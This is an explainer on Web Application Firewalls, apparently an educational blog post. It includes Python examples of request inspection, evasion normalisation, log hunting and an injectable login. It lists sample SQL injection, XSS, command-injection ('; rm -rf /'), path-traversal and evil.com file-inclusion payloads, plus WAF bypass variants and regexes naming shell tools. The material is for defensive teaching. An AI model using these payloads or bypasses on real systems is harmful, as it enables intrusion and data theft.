Kernel of Truth

Web Application Firewall (WAF)

What It Is, How It Works, and Why It Matters.

What is a Web Application Firewall (WAF)?

A Web Application Firewall (WAF) is a Layer 7 (application layer) security control that inspects HTTP and HTTPS traffic to and from a web application. Its purpose is to detect and block malicious requests that exploit application-level vulnerabilities.

Unlike traditional firewalls that operate at the network or transport layer, a WAF understands web protocols, URLs, headers, cookies, and request bodies.

WAFs are commonly deployed as:

  • Cloud-based services (Cloudflare, AWS WAF, Azure WAF)
  • Reverse proxy appliances
  • Host-based software modules within web servers

How a WAF Works

A WAF sits in front of a web application, usually as a reverse proxy (cloud and appliance deployments) or as a module loaded into the web server itself (host-based deployments). It inspects inbound requests, and optionally outbound responses, and applies its rules before a request reaches the application code.

Typical inspection points include:

  • HTTP headers
  • URL parameters and query strings
  • POST body content (form submissions, APIs)
  • Cookies and session tokens

WAFs use:

  • Signature-based rules
  • Behavioural and anomaly detection
  • Rate limiting and bot detection
  • Machine learning (in advanced SaaS platforms)

WAF vs Traditional Network Firewall

Feature                  | Network Firewall (NGFW)                     | Web Application Firewall (WAF)
OSI layer                | Layers 3 and 4 (some L7 via IPS signatures) | Layer 7
Protocol awareness       | IP, TCP, UDP                                | HTTP, HTTPS, APIs
Understands web payload  | No                                          | Yes
Blocks SQL injection     | Limited (IPS signatures, no app context)    | Yes
Blocks XSS               | Limited (IPS signatures, no app context)    | Yes
Rate-limits bots         | Limited                                     | Yes
Protects APIs            | Limited                                     | Yes

Why Use a WAF Instead of a Network Firewall?

A network firewall cannot see inside encrypted HTTPS traffic at the application layer. Even with TLS inspection it sees bytes and generic signatures, not the application's parameters, sessions, or logic.

A WAF is preferred because it:

  • Detects application-layer attacks that pass straight through a network firewall, because they arrive inside valid TCP connections on port 443
  • Provides virtual patching: a rule blocks requests targeting a newly disclosed vulnerability until the code fix ships
  • Protects legacy applications that cannot be easily patched
  • Mitigates automated attacks such as credential stuffing and bots
  • Helps meet regulatory compliance requirements (for example PCI DSS)

In modern cloud architectures a WAF is treated as a baseline control for internet-facing web services, alongside secure coding and patching rather than instead of them.


Common Attacks Blocked by a WAF (With Examples)

1. SQL Injection (SQLi)

Attack Example:

https://site.com/login?user=admin' OR '1'='1

What WAF Does:
Detects SQL keywords and injection patterns in parameters and blocks the request.


2. Cross-Site Scripting (XSS)

Attack Example:

<script>alert('Hacked')</script>

What WAF Does:
Blocks embedded script tags and malicious JavaScript payloads.


3. Command Injection

Attack Example:

; rm -rf /

What WAF Does:
Detects shell metacharacters followed by command names and blocks the request before it reaches the application.


4. Path Traversal

Attack Example:

../../../../etc/passwd

What WAF Does:
Detects directory traversal sequences (../ and encoded variants) and blocks the request before the application opens the file.


5. Remote File Inclusion (RFI)

Attack Example:

http://site.com/page.php?file=http://evil.com/malware.txt

What WAF Does:
Blocks external file inclusion attempts.


6. Credential Stuffing and Brute Force

Attack Example:
Automated login attempts using leaked username and password lists.

What WAF Does:
Rate limits requests, detects automation, and blocks bots.


7. DDoS at the Application Layer (Layer 7)

Attack Example:
Massive HTTP GET floods that look legitimate.

What WAF Does:
Uses behavioural analysis, CAPTCHA challenges, and rate limiting.
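The inspection points and detection methods listed under How a WAF Works, and the attack classes above, as one added example (not code from the original page, and not any vendor's engine): a minimal Python inspector that decodes the path, query string, cookies, headers and form body, runs a constructed signature set over the fields each rule applies to, and enforces a per-client sliding-window rate limit. Rule IDs, patterns, sample requests and IP addresses are all invented for the example; it assumes Python 3.10 or later (so parse_qsl splits only on &).

```python
import re
import time
from collections import defaultdict, deque
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed rule set covering the attack classes above. Rule IDs and
# patterns are invented for this example; they are not CRS or vendor rules.
ANY = frozenset({"path", "query", "body", "cookie", "header"})
RULES = [
    ("EX-001", "SQL injection", ANY,
     re.compile(r"""['"]\s*(or|and)\s*['"]?\d+['"]?\s*=\s*['"]?\d+|\bunion\s+select\b""", re.I)),
    ("EX-002", "Cross-site scripting", ANY,
     re.compile(r"<\s*script\b|javascript\s*:|\bon(load|error|click)\s*=", re.I)),
    ("EX-003", "Command injection", ANY,
     re.compile(r"[;&|`]\s*(rm|cat|wget|curl|nc|sh|bash)\b|\$\(", re.I)),
    ("EX-004", "Path traversal", ANY,
     re.compile(r"(\.\./|\.\.\\)|/etc/passwd", re.I)),
    # RFI only makes sense for parameter values; matching it on headers such
    # as Referer would be a guaranteed false positive.
    ("EX-005", "Remote file inclusion", frozenset({"query", "body"}),
     re.compile(r"^\s*(https?|ftp)://", re.I)),
]


def inspection_points(request):
    """Yield (location, decoded value) for every field a WAF looks at."""
    url = urlsplit(request["url"])
    yield "path", unquote(url.path)
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        yield f"query:{key}", value            # parse_qsl URL-decodes for us
    headers = request.get("headers", {})
    for name, value in headers.items():
        if name.lower() == "cookie":
            for part in value.split(";"):
                ck, _, cv = part.strip().partition("=")
                yield f"cookie:{ck}", unquote(cv)
        else:
            yield f"header:{name}", value
    body = request.get("body", "")
    if "application/x-www-form-urlencoded" in headers.get("Content-Type", ""):
        for key, value in parse_qsl(body, keep_blank_values=True):
            yield f"body:{key}", value
    elif body:
        yield "body", body                     # JSON / raw API payloads


class MiniWAF:
    """Signature matching plus a per-client sliding-window rate limit."""

    def __init__(self, rate_limit=5, window=60.0):
        self.rate_limit = rate_limit           # requests allowed per window
        self.window = window                   # seconds
        self._hits = defaultdict(deque)

    def _over_rate(self, client_ip, now):
        hits = self._hits[client_ip]
        hits.append(now)
        while hits and now - hits[0] > self.window:
            hits.popleft()                     # drop timestamps outside the window
        return len(hits) > self.rate_limit

    def inspect(self, request, now=None):
        now = time.monotonic() if now is None else now
        if self._over_rate(request["client_ip"], now):
            return {"action": "block", "rule": "EX-100", "reason": "rate limit", "location": "client_ip"}
        for location, value in inspection_points(request):
            for rule_id, name, scope, pattern in RULES:
                if location.split(":")[0] in scope and pattern.search(value):
                    return {"action": "block", "rule": rule_id, "reason": name, "location": location}
        return {"action": "allow", "rule": None, "reason": None, "location": None}


# Constructed requests mirroring the attack examples above, plus one benign one.
SAMPLE_REQUESTS = [
    {"client_ip": "203.0.113.10", "url": "/login?user=admin'%20OR%20'1'%3D'1&pass=x", "headers": {}},
    {"client_ip": "203.0.113.11", "url": "/comment",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "text=%3Cscript%3Ealert('Hacked')%3C/script%3E"},
    {"client_ip": "203.0.113.12", "url": "/ping?host=127.0.0.1;rm%20-rf%20/", "headers": {}},
    {"client_ip": "203.0.113.13", "url": "/download?file=../../../../etc/passwd", "headers": {}},
    {"client_ip": "203.0.113.14", "url": "/page.php?file=http://evil.com/malware.txt", "headers": {}},
    {"client_ip": "203.0.113.15", "url": "/products?id=42", "headers": {"Cookie": "session=abc123"}},
]


def inspect_all(requests, waf=None):
    """Run every request through one WAF instance and return the verdicts."""
    waf = waf or MiniWAF()
    return [waf.inspect(r, now=float(i)) for i, r in enumerate(requests)]


if __name__ == "__main__":
    for req, verdict in zip(SAMPLE_REQUESTS, inspect_all(SAMPLE_REQUESTS)):
        rule = verdict["rule"] or "-"
        print(f"{verdict['action']:5} {rule:7} {req['url']}  ({verdict['location']})")
```

The scope field is the detail worth noticing: the same regex that catches RFI in a query parameter would block every request carrying a Referer header if it were applied to headers too, which is how untuned rule sets produce the false positives discussed later on this page. The rate limiter is what the credential-stuffing and Layer 7 flood items rely on; it never looks at payload content at all.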


Types of WAF

Network-Based WAF

Hardware appliance deployed in a data centre. High performance but expensive.

Host-Based WAF

Installed directly on the web server as software or modules (for example ModSecurity).

Cloud-Based WAF (SaaS)

Delivered as a managed service. Scales automatically and integrates with CDN platforms.

Cloud-based WAFs are the dominant model today.


WAF in Cloud Platforms

AWS

  • AWS WAF integrated with CloudFront, Application Load Balancer and API Gateway

Microsoft Azure

  • Azure WAF integrated with Application Gateway and Front Door

Cloudflare

  • Global edge-based WAF with integrated CDN and DDoS mitigation

Cloud WAFs provide:

  • Global traffic scrubbing
  • TLS termination
  • Threat intelligence feeds
  • Bot management

WAF in Compliance Frameworks

WAFs are explicitly referenced in security standards:

  • PCI DSS: v3.2.1 Requirement 6.6 accepted either a WAF or regular application vulnerability review; v4.0 Requirement 6.4.2 requires an automated technical solution such as a WAF for public-facing web applications
  • ISO 27001: Web security controls in Annex A
  • NIST SP 800-53: System and communications protection controls

A WAF is often a compensating control when legacy applications cannot be patched.


Limitations and Bypass Techniques

A WAF is not a silver bullet.

Limitations include:

  • False positives blocking legitimate users (a product description containing "select", or a form field that legitimately holds a URL, can trip a broad rule)
  • False negatives due to evasion: double encoding, comment insertion and unusual whitespace that a poorly normalised rule never sees
  • Encrypted payloads: the WAF must terminate TLS (or hold the server's private key) to inspect HTTPS; anything it cannot decrypt it cannot inspect
  • Logic flaws and business logic attacks (IDOR, abuse of valid features) are usually invisible, because the requests are syntactically normal
  • Skilled attackers can bypass poorly tuned rule sets, and a rule set left on vendor defaults is a poorly tuned one

Security engineers must tune rules and monitor logs continuously.
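The evasion and logic-flaw limitations above, as an added example (not code from the original page): a single constructed SQLi signature run through two normalisers. The naive one URL-decodes once; the hardened one decodes until the string stops changing and turns SQL comments into whitespace, the same idea as ModSecurity's urlDecodeUni and replaceComments transformations. The probes, and the assumption that five decode rounds are enough, are invented for the example.

```python
import re
from urllib.parse import unquote

# One constructed SQLi signature; real rule sets carry hundreds of these.
SQLI = re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.I)


def naive_normalize(value):
    """Single URL-decode, as a poorly tuned engine might do."""
    return unquote(value)


def hardened_normalize(value, max_rounds=5):
    """Decode until stable, turn SQL comments into whitespace, collapse runs."""
    for _ in range(max_rounds):                # defeats double/triple encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)   # /**/ -> one space
    return re.sub(r"\s+", " ", value)


def naive_blocks(value):
    return bool(SQLI.search(naive_normalize(value)))


def hardened_blocks(value):
    return bool(SQLI.search(hardened_normalize(value)))


# Constructed probes. The last one is a logic flaw (changing an order ID you
# do not own); no signature engine sees anything wrong with it.
PROBES = {
    "plain":          "1'%20UNION%20SELECT%20username,password%20FROM%20users",
    "double_encoded": "1%2527%2520UNION%2520SELECT%2520username,password",
    "comment_space":  "1'/**/UNION/**/SELECT/**/username,password",
    "tab_newline":    "1'%09UNION%0ASELECT%09username,password",
    "logic_flaw":     "/api/orders/1002",
}


def evaluate(probes=PROBES):
    """Return {name: (naive_verdict, hardened_verdict)} for each probe."""
    return {name: (naive_blocks(p), hardened_blocks(p)) for name, p in probes.items()}


if __name__ == "__main__":
    label = lambda blocked: "block" if blocked else "allow"
    for name, (naive, hardened) in evaluate().items():
        print(f"{name:15} naive={label(naive):5} hardened={label(hardened)}")
```

Two caveats belong with this. First, the hardened normaliser is better, not complete: every extra transformation is another thing an attacker can study, and the logic-flaw probe is allowed by both engines because there is nothing in it to match. Second, decoding must mirror the backend: if the application decodes only once, the double-encoded probe is not SQL injection against it at all, so a WAF that decodes more aggressively than the application trades a false negative for a false positive.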


WAF Logging and SOC Use

WAF logs are valuable for:

  • Detecting exploitation attempts
  • Threat hunting (SQLi, XSS probes)
  • Incident response timeline reconstruction
  • SIEM ingestion and correlation

Common log fields:

  • Source IP
  • URI path and parameters
  • Action taken (allow, block, challenge)
  • Rule ID triggered
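The SOC uses listed above, as an added example (not code from the original page, and not any vendor's log schema): a handful of constructed JSON-lines WAF events with the fields named above, and four small hunts over them. Field names, rule IDs, timestamps and IP addresses are all invented; the "possible bypass" heuristic (a source blocked on a path that later gets a 2xx allow on the same path with a quote in the query) is a starting point for analyst review, not a verdict.

```python
import json
from collections import Counter, defaultdict
from datetime import datetime

# Constructed WAF events in a generic JSON-lines shape. Field names and rule
# IDs are invented for this example, not any vendor's schema.
RAW_LOGS = """\
{"ts":"2024-05-01T10:00:01Z","src_ip":"198.51.100.7","method":"GET","uri":"/login?user=admin'%20OR%20'1'%3D'1","action":"BLOCK","rule_id":"sqli-generic","status":403}
{"ts":"2024-05-01T10:00:03Z","src_ip":"203.0.113.5","method":"GET","uri":"/products?id=42","action":"ALLOW","rule_id":null,"status":200}
{"ts":"2024-05-01T10:00:04Z","src_ip":"198.51.100.7","method":"GET","uri":"/search?q=%3Cscript%3Ealert(1)%3C/script%3E","action":"BLOCK","rule_id":"xss-generic","status":403}
{"ts":"2024-05-01T10:00:09Z","src_ip":"198.51.100.7","method":"GET","uri":"/download?file=../../../../etc/passwd","action":"BLOCK","rule_id":"lfi-generic","status":403}
{"ts":"2024-05-01T10:00:12Z","src_ip":"192.0.2.9","method":"POST","uri":"/login","action":"BLOCK","rule_id":"rate-login","status":429}
{"ts":"2024-05-01T10:00:13Z","src_ip":"192.0.2.9","method":"POST","uri":"/login","action":"BLOCK","rule_id":"rate-login","status":429}
{"ts":"2024-05-01T10:00:20Z","src_ip":"198.51.100.7","method":"GET","uri":"/login?user=admin'/**/OR/**/1%3D1--","action":"ALLOW","rule_id":null,"status":200}
{"ts":"2024-05-01T10:00:25Z","src_ip":"203.0.113.5","method":"POST","uri":"/login","action":"ALLOW","rule_id":null,"status":302}
"""


def parse_logs(text=RAW_LOGS):
    """Parse JSON lines, add a datetime and a query-stripped path, sort by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        e["time"] = datetime.fromisoformat(e["ts"].replace("Z", "+00:00"))
        e["path"] = e["uri"].split("?", 1)[0]
        events.append(e)
    return sorted(events, key=lambda e: e["time"])


def blocks_by_ip(events):
    """Blocked requests per source IP: the first thing a dashboard shows."""
    return Counter(e["src_ip"] for e in events if e["action"] == "BLOCK")


def probing_ips(events, min_paths=3):
    """IPs blocked on several distinct paths: a scanner, not one bad request."""
    paths = defaultdict(set)
    for e in events:
        if e["action"] == "BLOCK":
            paths[e["src_ip"]].add(e["path"])
    return sorted(ip for ip, p in paths.items() if len(p) >= min_paths)


def possible_bypasses(events):
    """(ip, path) pairs where a source was blocked, then later allowed with a
    2xx on the same path carrying a quote in the query: worth an analyst's look,
    because the rule may have been evaded."""
    blocked = set()
    hits = []
    for e in events:                           # events are time-ordered
        key = (e["src_ip"], e["path"])
        if e["action"] == "BLOCK":
            blocked.add(key)
        elif key in blocked and 200 <= e["status"] < 300 and "'" in e["uri"]:
            hits.append(key)
    return hits


def timeline(events, ip):
    """Per-IP sequence of (ts, action, path, rule) for incident reconstruction."""
    return [(e["ts"], e["action"], e["path"], e["rule_id"]) for e in events if e["src_ip"] == ip]


if __name__ == "__main__":
    ev = parse_logs()
    print("blocks by IP:", blocks_by_ip(ev).most_common())
    print("probing IPs:", probing_ips(ev))
    print("possible bypasses:", possible_bypasses(ev))
    for row in timeline(ev, "198.51.100.7"):
        print("  ", *row)
```

The same four queries translate directly into SIEM searches once the WAF log is ingested; the bypass hunt in particular is the one that turns WAF telemetry from a block counter into a detection for the gap the WAF itself missed.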

WAF vs Secure Coding

A WAF does not replace secure development.
It is a defence-in-depth control that reduces risk while vulnerabilities are fixed.

Security engineers should treat WAFs as:

  • A shield for production systems
  • A temporary mitigation for zero-days
  • A telemetry source for application attacks
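Why a WAF does not replace secure development, as an added example (not code from the original page): the page's own login payload, a string-built SQL query, a parameterised one, and a deliberately narrow constructed WAF signature. The second payload evades the signature and still logs in against the vulnerable query; the parameterised query rejects both without the WAF's help. The in-memory SQLite users table and the signature are invented for the example.

```python
import re
import sqlite3


def build_db():
    """Constructed users table, in memory, so the example runs offline."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cret"), ("bob", "hunter2")])
    return con


def vulnerable_login(con, user, password):
    """String-built query: the injectable pattern a WAF is asked to cover for."""
    sql = f"SELECT COUNT(*) FROM users WHERE username='{user}' AND password='{password}'"
    return con.execute(sql).fetchone()[0] > 0


def safe_login(con, user, password):
    """Parameterised query: input is data, never SQL, whatever the WAF saw."""
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return con.execute(sql, (user, password)).fetchone()[0] > 0


# A deliberately narrow constructed signature that catches the page's payload
# ("' OR '") and nothing cleverer.
NAIVE_WAF = re.compile(r"'\s+or\s+'", re.I)


def waf_blocks(value):
    return bool(NAIVE_WAF.search(value))


def compare(user, password="wrong"):
    """Return (waf_blocked, vulnerable_login_ok, safe_login_ok) for one attempt."""
    con = build_db()
    return (waf_blocks(user), vulnerable_login(con, user, password), safe_login(con, user, password))


if __name__ == "__main__":
    for u in ["admin", "admin' OR '1'='1", "admin'/**/OR/**/1=1--"]:
        blocked, vuln, safe = compare(u)
        print(f"{u!r:28} waf_blocked={blocked} vulnerable_login={vuln} safe_login={safe}")
```

The third payload is the defence-in-depth argument in one line: comment characters slip past the signature, the string-built query still authenticates the attacker, and the parameterised query is unaffected because the WAF was never what protected it.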

Interview Talking Points for Cyber Security Engineers

  • WAF operates at Layer 7, unlike network firewalls at Layers 3 and 4
  • Mitigates the injection-class OWASP Top 10 issues (SQLi, XSS, traversal); it does not fix access-control or design flaws
  • Used for virtual patching and legacy system protection
  • Key control for PCI DSS compliance
  • Generates valuable telemetry for SOC detection engineering
  • Must be tuned to avoid false positives and bypasses

Summary

A Web Application Firewall is a critical security control that protects web applications from modern attack techniques that traditional firewalls cannot detect. In cloud-native architectures, WAFs are a standard baseline control alongside EDR, SIEM, and IAM.

